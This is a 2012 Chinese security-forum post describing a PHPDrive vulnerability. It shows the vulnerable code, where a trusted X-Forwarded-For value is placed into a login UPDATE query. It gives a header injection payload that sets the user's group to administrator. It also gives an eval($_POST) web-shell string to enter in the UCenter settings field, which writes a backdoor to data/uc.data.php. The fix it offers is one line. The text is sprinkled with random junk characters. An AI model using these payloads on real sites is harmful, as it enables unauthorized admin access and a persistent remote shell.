找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2206|回复: 0
打印 上一主题 下一主题

PHPDrive权限提升漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-31 09:18:34 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等
) B- c5 c9 U- z" f4 L; J, F# a$ d8 n' w0 @- W3 n3 m* G" \
includes/user.lib.php$ u, H' j# f5 x5 s$ h" Z5 f9 \
行87, d- ^$ a+ B5 a- D" b1 `. {
function get_ip() {" T# O5 ]7 z( S& e" f- V2 O5 U
if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.$ c) I% P7 P! ^* u; y$ R
在用户注册与登录 处module/disk/account.lead.php5 g! X0 B7 P9 T1 I, h/ L! v& p- v
198行
# B  a' d# C# K) @ //更新本次登录IP和时间" }8 K: `8 B" n2 w( W7 `3 U
             $db->Query(‘UPDATE `’.$db->TPre.’user` SET `before_last_date` = ‘.$UserArr['last_date'].’,`last_date` = ‘.$NowUnixTime.’,`before_last_ip` = “‘.$UserArr['last_ip'].’”,`last_ip` = “‘.get_ip().’” WHERE `uid` = ‘.$UserArr['uid'].’;');//get_ip()入库注入产生8 K5 p" F1 i7 {
由于本套程序user与manager是存在于同一个表下的,只是用group字段来区分两者,group=1为管理员,2则为普通用户。所以可以利用以上注入,将普通用户的group值改为1,即可提升权限' U) z8 y% m& L4 L4 o/ ?" T/ r
实现方法:使用firefox的一款插件x-forwarded-for Header 1.0,将你的IP地址改为123″,`group`=”1然后登陆,这时候你就是管理员了.) s, U; ?. l9 T  r! q+ X7 Q. J; @
后台getshell:5 T, s  Y7 l: |, g4 g
在UCenter设置处,将UC数据库登录名填写为
0 S1 \4 ?. C1 Q+ K  D , D+ _0 Z2 M6 ^9 x# k
root’);eval($_POST[DisKill]);?>/*
: m: a* ?8 L* L% ~可以得到一个shell,位置在 data/uc.data.php; c( l! e" H& q

) c: \. f6 X2 ^/ }7 _! R: h修复:过滤注入$ K) S1 H& |3 Q" h8 u/ J- Z: l
, s; e. ]9 C8 K5 Q0 M, B
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表